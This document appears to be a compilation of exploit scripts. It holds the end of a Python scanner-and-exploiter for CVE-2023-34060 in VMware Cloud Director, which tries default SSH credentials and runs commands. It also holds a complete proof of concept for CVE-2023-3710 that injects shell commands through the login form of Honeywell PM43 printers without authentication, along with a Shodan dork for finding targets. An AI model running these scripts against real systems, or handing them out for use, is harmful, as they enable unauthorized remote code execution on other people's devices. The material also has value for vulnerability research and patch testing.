# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()

# Loop through the ports and check for the vulnerability
for port in args.ports:
    # Check if the port is open
    if is_port_open(args.ip, port):
        # The port is open; send a GET request to the port and check the
        # status code. A service that does not speak HTTP (sshd on 22, for
        # instance) raises instead of answering, so treat that as "no 200"
        # rather than letting the script crash.
        try:
            status = requests.get(f"http://{args.ip}:{port}", timeout=5).status_code
        except requests.exceptions.RequestException as err:
            print(f"Port {port} did not answer HTTP: {err}")
            status = None
        if status == 200:
            # The port is open and vulnerable
            print(f"Port {port} is vulnerable to CVE-2023-34060")
            # Create a thread to exploit the device
            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
            # Start the thread
            thread.start()
        else:
            # The port is open but not vulnerable
            print(f"Port {port} is not vulnerable to CVE-2023-34060")
    else:
        # The port is closed
        print(f"Port {port} is closed")
```
-
Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
```python
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Firmware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710

import argparse

import requests
import urllib3

# Printer web interfaces use self-signed certificates; verification is off
# below, so silence the warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'


def banner():
    banner = """
    ╔════════════════════════════════════════════════╗
      CVE-2023-3710
      Command Injection in Honeywell PM43 Printers
      Author: ByteHunter
    ╚════════════════════════════════════════════════╝
    """
    print(YELLOW + banner + RESET)


def run_command(url, command):
    # The injection point is the login form's username field: newlines in
    # the value are not filtered, so a command placed on its own line after
    # a dummy username ("hunt") is executed by the printer. No valid
    # credentials are needed; the password value is arbitrary.
    full_url = f"{url}/loadfile.lp?pageid=Configure"
    payload = {
        'username': f'hunt\n{command}\n',
        'userpassword': 'admin12345admin!!'
    }
    try:
        response = requests.post(full_url, data=payload, verify=False, timeout=15)
        response_text = response.text
        # The command output comes back ahead of the page's HTML; keep only
        # the part before the <html> tag.
        html_start_index = response_text.find('<html>')
        if html_start_index != -1:
            return response_text[:html_start_index]
        else:
            return response_text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"


def main():
    parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
    parser.add_argument('--url', dest='url', help='Target URL', required=True)
    parser.add_argument('--run', dest='command', help='Command to execute', required=True)
    args = parser.parse_args()

    response = run_command(args.url, args.command)
    print(f"{BLUE}{response}{RESET}")


if __name__ == "__main__":
    banner()
    main()
```